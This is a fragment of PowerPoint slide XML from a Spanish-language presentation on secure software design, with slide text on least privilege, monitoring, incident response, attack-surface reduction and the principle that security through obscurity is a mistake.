              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1025426" y="1063702"/>
            <a:ext cx="4330090" cy="2296494"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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C098A13D-533F-96A5-EE81-0F46EAB2DC7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4412421"/>
            <a:ext cx="5256479" cy="1714589"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Imagen 12" descr="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0976EEA6-D983-03C1-32ED-0FACD9D14F3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1897373"/>
            <a:ext cx="4142745" cy="2790250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED91DA5D-5B22-60A2-208F-DD7EFCAF6E09}"/>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07297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C8D17-7693-4888-DD3F-934039090740}"/>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A788A9A-C85B-FFB9-E5D4-5EAF81CFB35B}"/>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E313A61-8523-4968-7C5C-CFE52D8F03A3}"/>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Entornos de desarrollo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F72B2B0-9BBC-F7C9-9C24-1281F7E3676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9" name="Diagrama 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86BC5AC0-0F87-1B9C-A961-B6A3E6D2EB6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3972444798"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="530828" y="957200"/>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Grupo 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B87B2FE-5EBC-4A3B-0E10-20A1D9E646C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1413458" y="2317342"/>
            <a:ext cx="3105345" cy="1319882"/>
            <a:chOff x="0" y="218852"/>
            <a:chExt cx="3105345" cy="1863207"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectángulo 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F036697E-59AF-C348-E040-572D90F12891}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="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12" name="CuadroTexto 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{142FED8E-40F5-4505-E57F-FE0159304347}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="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Cambios de credenciales</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="CuadroTexto 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{847837B5-E2BA-AAA2-668B-6EA24F6988AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5839904" y="2317341"/>
            <a:ext cx="3105345" cy="1319882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>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Ofuscación</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Grupo 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5758B53-0939-39EA-0013-4E09075C2E62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3556816" y="4164369"/>
            <a:ext cx="3105345" cy="1319882"/>
            <a:chOff x="3415880" y="218852"/>
            <a:chExt cx="3105345" cy="1863207"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectángulo 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{340FD378-5CF2-0F8F-2A85-6EED6B48FE4E}"/>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19" name="CuadroTexto 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0D21617-AAEE-3561-51A4-54026203819D}"/>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err="1">
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Minificación</a:t>
              </a:r>
              <a:endParaRPr lang="es-ES" sz="1600" kern="1200">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Grupo 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B1E83D6-F568-3027-5444-D439BB550534}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8032973" y="4164369"/>
            <a:ext cx="3105345" cy="1319882"/>
            <a:chOff x="3415880" y="218852"/>
            <a:chExt cx="3105345" cy="1863207"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Rectángulo 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D36FDB97-09B7-09D1-3EFD-BF46EA01644A}"/>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3" name="CuadroTexto 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4A9EB7B-1D13-3547-B9DB-9C40FC5772EB}"/>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Configuración segura de usuarios y sus permisos. Mínimo privilegio.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEF8783B-0A2A-9B11-40B6-AE6D96282F58}"/>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152976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2FE8B-18E6-8212-2330-946E3D3A635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6F15A32B-7D02-D238-8F89-C4E68DA60F3F}"/>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3BF7838-EDC0-E865-F4AB-082D36C8724F}"/>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Entornos de desarrollo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A98F927-F2D2-2A0A-F9C7-6FA80A7A589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1F67C6FA-3D77-4BF1-2588-2C5D69ACEE3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="759732" y="1449350"/>
            <a:ext cx="9505794" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="Diagrama 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95EFF848-E134-DB0E-0F0C-BED6400A42E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3604573838"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="530828" y="874750"/>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 name="Grupo 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7F9717E-5394-CD00-12BD-5DE14264F280}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1272871" y="2264278"/>
            <a:ext cx="3105345" cy="1282411"/>
            <a:chOff x="0" y="218852"/>
            <a:chExt cx="3105345" cy="1863207"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectángulo 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E02D1F3C-0E5E-94D0-DA76-E719A3FBC772}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="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7" name="CuadroTexto 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE7ACAE5-694E-823E-1CBB-538306C7795D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="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Trazabilidad</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Grupo 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8FD2F0E-B0A3-AF5E-EAF8-4841EB82422D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4536070" y="2264278"/>
            <a:ext cx="3105345" cy="1282411"/>
            <a:chOff x="3415880" y="218852"/>
            <a:chExt cx="3105345" cy="1863207"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Rectángulo 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA068F8F-9510-39A1-0C3D-4E20AC086366}"/>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6" name="CuadroTexto 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAF79289-CDC9-AE24-713E-1B0D55AFDA0D}"/>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Monitorización</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Grupo 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42E3A546-AEA4-FE41-52CB-80D2AD3AFF5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7786569" y="2264278"/>
            <a:ext cx="3105345" cy="1282411"/>
            <a:chOff x="3415880" y="218852"/>
            <a:chExt cx="3105345" cy="1863207"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Rectángulo 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BEADD23-E2AE-15F9-A23A-FBE54483C6C4}"/>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9" name="CuadroTexto 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{428ACD9A-4690-8021-A66C-9114060BC26D}"/>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Capacidad de respuesta ante incidentes de seguridad</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Grupo 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACF38EDD-4846-BA81-F79F-3382BC8ADDC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2881925" y="4220890"/>
            <a:ext cx="3105345" cy="1282411"/>
            <a:chOff x="3415880" y="218852"/>
            <a:chExt cx="3105345" cy="1863207"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Rectángulo 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FC4D182-71A4-2410-DD6E-72868204C1EC}"/>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32" name="CuadroTexto 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EDC4766-1302-D1BB-B257-6D56F445ABFF}"/>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Control de seguridad: Automatizado y manual</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="711200">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="es-ES" sz="1600" kern="1200">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="Grupo 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7E0656D-B0DB-6C50-9B72-BAF3B462A3C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6132424" y="4220889"/>
            <a:ext cx="3105345" cy="1282411"/>
            <a:chOff x="3415880" y="218852"/>
            <a:chExt cx="3105345" cy="1863207"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Rectángulo 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17FC74CE-1B65-3790-539D-0267AF7F5AAC}"/>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35" name="CuadroTexto 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{488BA98B-1535-5F04-0C26-E6E7234C7F02}"/>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Gestión de Políticas de Seguridad</a:t>
              </a:r>
              <a:endParaRPr lang="es-ES" sz="1600" kern="1200">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Imagen 8" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C04DA1-F139-BE7F-63C8-E26BAC85ECE6}"/>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123119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2AAAB20-B907-244D-EB28-EF12E058FB81}"/>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32555DC7-0254-42CE-D747-A7AF2BA64E95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7125"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EE45D1C-A8A6-1489-0E71-FACBD08FED8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258892" y="2687716"/>
            <a:ext cx="5951410" cy="2616101"/>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6.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SEGURIDAD APLICADA A DISEÑO: ARQUITECTURA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01DC142E-3676-4BD5-81F3-3C811040AAA5}"/>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Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E10211B4-21E9-5D85-1B81-E77CF090DBB6}"/>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870080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F1A76-C07E-4448-B536-529F005E62C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F483C533-4464-5E8F-F0B3-38FC82A3492C}"/>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79413EF-7AA2-B4B1-912F-711D9398C751}"/>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Principios de diseño seguro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A293FA5C-A38D-D476-5556-40791A14416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8" name="Picture 2" descr="Qué es la codificación segura y por qué es importante?">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7C18D0C-0105-AA10-EB65-466F34967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34" y="3193899"/>
            <a:ext cx="5549134" cy="277456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022B1821-7A6D-5F50-563B-2329B6A3FA9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1377217" y="1235208"/>
            <a:ext cx="30982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800" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Minimizar la superficie de ataque</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="210022"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="CuadroTexto 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FDA6F5F-C9B5-EBF1-A268-EBA951055FE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1377289" y="2315952"/>
            <a:ext cx="35747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800" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Segregar responsabilidades</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800">
              <a:solidFill>
                <a:srgbClr val="210022"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="CuadroTexto 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F936E7BC-3816-D308-2FE3-3FAEC36E2F16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1377362" y="3396695"/>
            <a:ext cx="32659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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Seguir el principio de mínimo privilegio</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="CuadroTexto 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFC475D3-BA40-462B-9A1A-9FFC15F220BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1377259" y="4619953"/>
            <a:ext cx="34560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800" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="210022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Seguridad por oscuridad es un error</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="210022"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
